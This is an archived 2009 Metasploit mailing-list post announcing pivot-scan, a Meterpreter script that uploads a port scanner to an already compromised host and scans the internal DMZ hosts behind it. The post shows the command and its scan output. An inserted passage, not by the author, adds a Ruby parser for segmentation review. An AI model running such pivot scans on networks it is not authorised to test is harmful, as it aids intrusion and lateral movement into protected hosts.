Metasploit mailing list archives

Pivot-scan


From: aepereyra at gmail.com (Augusto Pereyra)
Date: Fri, 27 Mar 2009 16:30:11 -0300

Hi list:

This little Meterpreter tool written in Ruby, called pivot-scan,
facilitates the process of enumerating hosts in a DMZ by autodetecting the
LAN, then uploading and using a port scanner.
When you have a Meterpreter session on a host, you run it in the following way:


meterpreter > run pivot-scan -a
[*] Created by Augusto Pereyra aepereyra at gmail.com
[*] Uploading Portscanner
[*] Performing portscanning for IP range 192.168.1.1-192.168.1.254
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)

192.168.1.3,"",0,0,"Yes","139 445 12345","123 137 138 445 500"
192.168.1.10,"",0,0,"Yes","7 9 13 19 135 139 445 12345","7 9 137 138
161 445 500 1027"
192.168.1.9,"",0,0,"Yes","135 139 445 1433 8080 12345","137 138 445 500 1434"
192.168.1.14,"",0,0,"Yes","7 9 13 19 135 139 1433","7 9 137 138 500 1434"
192.168.1.16,"",0,0,"Yes","7 9 13 19 135 139 445 12345","7 9 137 138
161 445 500 1027"
192.168.1.18,"",0,0,"Yes","21 23 25 80 515","69 137 138 161"
192.168.1.23,"",0,0,"Yes","135 139 445 1025 1755 3372 6666","135 137
138 445 500 1027"
192.168.1.178,"",546,0,"Yes","
443","7 9 11 53 68 69 111 123 135 137 161 191 192 256 260 407 445 500
514 520 1009 1024 1025 1027 1028 1030 1033 1034 1035 1037 1041 1058
1060 1434 1645 1646 1812 1813 1900 1978 2002 2049 2140 2161 2301 2365
2493 2631 2967 3179 3327 3456 4045 4156 4296 4802 5631 5632 11487
31337 32768 32769 32770 32771 32772 32773 32774 32775 32777 32778
32779 32780 32781 32782 32783 32784 32785 32786 32787 32788 32789
32790"
192.168.1.201,"",0,2,"Yes","","53 67 68 69 123 137 138 161 514 520 1812"
192.168.1.210,"",0,0,"Yes","","68 161 1025"
meterpreter >

As you can see, all hosts in the DMZ were scanned by the controlled
host, and this is possible because they are all in the same LAN. The
hosts listed in the above example are unreachable from the internet but
not from the host used to do the port scan.
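For a segmentation review, the useful thing to do with output like the above is to turn it into a per-host and per-port inventory of what the compromised DMZ host could reach. The following is an added example, not code from pivot-scan or from the author of this post: a parser for the comma-separated output shown above, handling the mail-wrapped port lists that fall across line breaks inside the quotes. Only the IP column and the two quoted port-list columns (TCP then UDP, as read from the sample) are interpreted; the meaning of the two numeric columns and the "Yes" flag is not stated in the post, so they are kept as raw strings. The sample rows are constructed from the post's output.

```ruby
require 'csv'

# Constructed sample in the shape of the pivot-scan output quoted in the post.
# The line wrap inside the second host's quoted UDP list is kept on purpose
# so the parser is exercised on a field that spans two lines.
SAMPLE_OUTPUT = <<~'CSV'
  192.168.1.3,"",0,0,"Yes","139 445 12345","123 137 138 445 500"
  192.168.1.10,"",0,0,"Yes","7 9 13 19 135 139 445 12345","7 9 137 138
  161 445 500 1027"
  192.168.1.18,"",0,0,"Yes","21 23 25 80 515","69 137 138 161"
  192.168.1.201,"",0,2,"Yes","","53 67 68 69 123 137 138 161 514 520 1812"
CSV

# Column meanings beyond ip / tcp / udp are assumed, not documented in the post:
# col3, col4 and flag are carried through untouched.
Host = Struct.new(:ip, :name, :col3, :col4, :flag, :tcp, :udp)

# Space-separated port list (possibly wrapped over lines) -> sorted unique integers.
def port_list(field)
  field.to_s.split.map(&:to_i).sort.uniq
end

# Parse the whole scan output; quoted fields containing newlines are handled by
# the CSV library, so wrapped port lists come back as one field.
def parse_pivot_scan(text)
  CSV.parse(text).map do |row|
    next if row.compact.empty?
    ip, name, c3, c4, flag, tcp, udp = row
    Host.new(ip, name.to_s, c3, c4, flag, port_list(tcp), port_list(udp))
  end.compact
end

# IPs of scanned hosts on which the given port was seen open (proto: :tcp or :udp).
def hosts_exposing(hosts, port, proto: :tcp)
  hosts.select { |h| h.public_send(proto).include?(port) }.map(&:ip)
end

# Inverted view for a segmentation review: port -> list of reachable host IPs.
def exposure_by_port(hosts, proto: :tcp)
  hosts.each_with_object(Hash.new { |h, k| h[k] = [] }) do |host, acc|
    host.public_send(proto).each { |p| acc[p] << host.ip }
  end
end

if __FILE__ == $PROGRAM_NAME
  hosts = parse_pivot_scan(SAMPLE_OUTPUT)
  exposure_by_port(hosts).sort.each do |port, ips|
    puts "tcp/#{port}: #{ips.join(' ')}"
  end
end
```

Running the file prints one line per TCP port with the hosts reachable on it, which is the view a network owner wants when deciding which DMZ-to-LAN flows the firewall should have blocked.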

You can download this tool from the following link:

http://code.google.com/p/pivot-scan/downloads/list

Thank you
Best regards, Augusto Pereyra
